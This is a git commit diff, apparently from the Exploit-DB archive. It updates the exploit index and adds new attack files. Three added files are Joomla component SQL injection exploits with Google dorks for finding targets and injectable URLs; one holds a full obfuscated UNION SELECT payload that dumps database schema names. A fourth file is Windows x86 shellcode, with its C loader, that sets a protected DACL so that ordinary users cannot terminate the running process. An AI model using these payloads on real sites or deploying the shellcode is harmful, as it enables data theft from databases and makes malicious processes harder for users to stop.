DB: 2017-02-18
4 new exploits Netgear WGR614v9 Wireless Router - GET Request Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Windows x86 - Protect Process Shellcode (229 bytes) Qwerty CMS - 'id' SQL Injection Qwerty CMS - 'id' Parameter SQL Injection Golabi CMS - Remote File Inclusion Golabi CMS 1.0 - Remote File Inclusion blogman 0.45 - Multiple Vulnerabilities EZ-Blog 1b - Delete All Posts / SQL Injection Blogman 0.45 - Multiple Vulnerabilities EZ-Blog beta1 - Delete All Posts / SQL Injection Access2asp - imageLibrary - (ASP) Arbitrary File Upload Access2asp - imageLibrary - Arbitrary File Upload Joomla! Component com_digistore - 'pid' Blind SQL Injection Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection EZ-Blog Beta2 - (category) SQL Injection EZ-Blog Beta2 - 'category' Parameter SQL Injection Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection Joomla! Component Groovy Gallery 1.0.0 - SQL Injection Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection
This commit is contained in:
parent
2f2ccec5c2
commit
2d72a9c8b9
5 changed files with 189 additions and 11 deletions
26
files.csv
26
files.csv
|
@ -949,7 +949,7 @@ id,file,description,date,author,platform,type,port
|
|||
8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
|
||||
8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0
|
||||
8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0
|
||||
8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - GET Request Denial of Service",2009-02-25,staticrez,hardware,dos,0
|
||||
8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0
|
||||
8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0
|
||||
8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0
|
||||
8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0
|
||||
|
@ -3649,7 +3649,7 @@ id,file,description,date,author,platform,type,port
|
|||
28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0
|
||||
28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0
|
||||
28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0
|
||||
28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
|
||||
28775,platforms/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
|
||||
28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos,0
|
||||
30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0
|
||||
28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0
|
||||
|
@ -3962,7 +3962,7 @@ id,file,description,date,author,platform,type,port
|
|||
31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0
|
||||
31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0
|
||||
31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0
|
||||
31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0
|
||||
31403,platforms/unix/dos/31403.txt,"Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0
|
||||
31429,platforms/multiple/dos/31429.py,"VideoLAN VLC Media Player 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,multiple,dos,0
|
||||
31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0
|
||||
31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0
|
||||
|
@ -8172,7 +8172,7 @@ id,file,description,date,author,platform,type,port
|
|||
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0
|
||||
30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30839,platforms/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0
|
||||
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
|
||||
31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
|
||||
|
@ -15897,6 +15897,7 @@ id,file,description,date,author,platform,type,port
|
|||
41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
|
||||
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
|
||||
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
|
||||
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -20786,13 +20787,13 @@ id,file,description,date,author,platform,type,port
|
|||
8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' Parameter SQL Injection",2009-02-23,K-159,php,webapps,0
|
||||
8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0
|
||||
8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0
|
||||
8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
|
||||
8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' Parameter SQL Injection",2009-02-24,b3,php,webapps,0
|
||||
8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
|
||||
8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
|
||||
8112,platforms/php/webapps/8112.txt,"Golabi CMS - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0
|
||||
8112,platforms/php/webapps/8112.txt,"Golabi CMS 1.0 - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0
|
||||
8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0
|
||||
8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0
|
||||
8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
|
||||
|
@ -20800,13 +20801,13 @@ id,file,description,date,author,platform,type,port
|
|||
8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
|
||||
8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
|
||||
8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
|
||||
8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8127,platforms/php/webapps/8127.txt,"Blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8128,platforms/php/webapps/8128.txt,"EZ-Blog beta1 - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0
|
||||
8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0
|
||||
8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - (ASP) Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0
|
||||
8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0
|
||||
8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps,0
|
||||
8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0
|
||||
8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0
|
||||
8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0
|
||||
8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0
|
||||
8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0
|
||||
|
@ -21010,7 +21011,7 @@ id,file,description,date,author,platform,type,port
|
|||
8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0
|
||||
8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0
|
||||
8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
|
||||
8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
|
||||
8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' Parameter SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
|
||||
8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0
|
||||
8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php with' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
|
||||
8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0
|
||||
|
@ -37296,3 +37297,6 @@ id,file,description,date,author,platform,type,port
|
|||
41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0
|
||||
41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80
|
||||
41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0
|
||||
41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
17
platforms/php/webapps/41379.txt
Executable file
17
platforms/php/webapps/41379.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_teamdisplay
|
||||
# Date: 17.02.2017
|
||||
# Vendor Homepage: http://addonstreet.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/
|
||||
# Demo: http://addonstreet.com/demo/teamdisplay/
|
||||
# Version: 1.2.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL]
|
||||
# # # # #
|
18
platforms/php/webapps/41380.txt
Executable file
18
platforms/php/webapps/41380.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_groovygallery
|
||||
# Date: 17.02.2017
|
||||
# Vendor Homepage: http://addonstreet.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
|
||||
# Demo: http://addonstreet.com/products/groovy-gallery
|
||||
# Version: 1.0.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
|
||||
# # # # #
|
18
platforms/php/webapps/41382.txt
Executable file
18
platforms/php/webapps/41382.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_wmt_content_timeline
|
||||
# Date: 17.02.2017
|
||||
# Vendor Homepage: http://devecostudio.com
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
|
||||
# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
|
||||
# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
|
||||
# # # # #
|
121
platforms/win_x86/shellcode/41381.c
Executable file
121
platforms/win_x86/shellcode/41381.c
Executable file
|
@ -0,0 +1,121 @@
|
|||
/*
|
||||
|
||||
# Win32 - Protect Process Shellcode
|
||||
# Date: [17.02.2017]
|
||||
# Author: [Ege Balcı]
|
||||
# Tested on: [Win 7/8/8.1/10]
|
||||
|
||||
This shellcode sets the SE_DACL_PROTECTED flag inside security descriptor structure,
|
||||
this will prevent the process being terminated by non administrative users.
|
||||
|
||||
-----------------------------------------------------------------
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; EAX-> Return Values
|
||||
; EBX-> Process Handle
|
||||
; EBP-> API Block
|
||||
; ESI-> Saved ESP
|
||||
|
||||
pushad ; Save all registers to stack
|
||||
pushfd ; Save all flags to stack
|
||||
|
||||
push esp ; Push the current esp value
|
||||
pop esi ; Save the current esp value to ecx
|
||||
|
||||
cld ; Clear direction flags
|
||||
call Start
|
||||
|
||||
%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
|
||||
|
||||
Start:
|
||||
pop ebp ; Pop the address of SFHA
|
||||
|
||||
push 0x62C64749 ; hash(kernel32.dll, GetCurrentProcessId())
|
||||
call ebp ; GetCurrentProcessId()
|
||||
|
||||
push eax ; Process ID
|
||||
push 0x00000000 ; FALSE
|
||||
push 0x1F0FFF ; PROCESS_ALL_ACCESS
|
||||
push 0x50B695EE ; hash(kernel32.dll, OpenProcess)
|
||||
call ebp ; OpenProcess(PROCESS_ALL_ACCESS,FALSE,ECX)
|
||||
mov ebx, eax ; Move process handle to ebx
|
||||
|
||||
|
||||
push 0x00000000 ; 0,0
|
||||
push 0x32336970 ; pi32
|
||||
push 0x61766461 ; adva
|
||||
push esp ; Push the address of "advapi32" string
|
||||
push 0x0726774C ; hash(kernel32.dll, LoadLibraryA)
|
||||
call ebp ; LoadLibraryA("advapi32")
|
||||
|
||||
push 0x00503a44 ; "D:P"
|
||||
sub esp,4 ; Push the address of "D:P" string to stack
|
||||
|
||||
push 0x00000000 ; FALSE
|
||||
lea eax, [esp+4] ; Load the address of 4 byte buffer to EAX
|
||||
push eax ; Push the 4 byte buffer address
|
||||
push 0x00000001 ; SDDL_REVISION_1
|
||||
lea eax, [esp+16] ; Load the address of "D:P" string to EAX
|
||||
push eax ; Push the EAX value
|
||||
push 0xDA6F639A ; hash(advapi32.dll, ConvertStringSecurityDescriptorToSecurityDescriptor)
|
||||
call ebp ; ConvertStringSecurityDescriptorToSecurityDescriptor("D:P",SDDL_REVISION_1,FALSE)
|
||||
|
||||
push 0x00000004 ; DACL_SECURITY_INFORMATION
|
||||
push ebx ; Process Handle
|
||||
push 0xD63AF8DB ; hash(kernel32.dll, SetKernelObjectSecurity)
|
||||
call ebp ; SetKernelObjectSecurity(ProcessHandle,DACL_SECURITY_INFORMATION,SecurityDescriptor)
|
||||
|
||||
mov esp,esi ; Restore the address of esp
|
||||
popad ; Popback all registers
|
||||
popfd ; Popback all flags
|
||||
ret ; Return
|
||||
|
||||
|
||||
*/
|
||||
|
||||
|
||||
//>Special thanks to Yusuf Arslan Polat ;D
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
unsigned char Shellcode[] = {
|
||||
0x60, 0x9c, 0x54, 0x5e, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
|
||||
0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
|
||||
0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
|
||||
0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2,
|
||||
0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
|
||||
0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
|
||||
0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac,
|
||||
0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8,
|
||||
0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66,
|
||||
0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01,
|
||||
0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
|
||||
0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x49, 0x47,
|
||||
0xc6, 0x62, 0xff, 0xd5, 0x50, 0x6a, 0x00, 0x68, 0xff, 0x0f, 0x1f, 0x00,
|
||||
0x68, 0xee, 0x95, 0xb6, 0x50, 0xff, 0xd5, 0x89, 0xc3, 0x6a, 0x00, 0x68,
|
||||
0x70, 0x69, 0x33, 0x32, 0x68, 0x61, 0x64, 0x76, 0x61, 0x54, 0x68, 0x4c,
|
||||
0x77, 0x26, 0x07, 0xff, 0xd5, 0x68, 0x44, 0x3a, 0x50, 0x00, 0x83, 0xec,
|
||||
0x04, 0x6a, 0x00, 0x8d, 0x44, 0x24, 0x04, 0x50, 0x6a, 0x01, 0x8d, 0x44,
|
||||
0x24, 0x10, 0x50, 0x68, 0x9a, 0x63, 0x6f, 0xda, 0xff, 0xd5, 0x6a, 0x04,
|
||||
0x53, 0x68, 0xdb, 0xf8, 0x3a, 0xd6, 0xff, 0xd5, 0x89, 0xf4, 0x61, 0x9d,
|
||||
0xc3
|
||||
};
|
||||
|
||||
|
||||
|
||||
int main(int argc, char const *argv[])
|
||||
{
|
||||
char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
memcpy(BUFFER, Shellcode, sizeof(Shellcode));
|
||||
(*(void(*)())BUFFER)();
|
||||
|
||||
printf("This process is protected !");
|
||||
getchar();
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue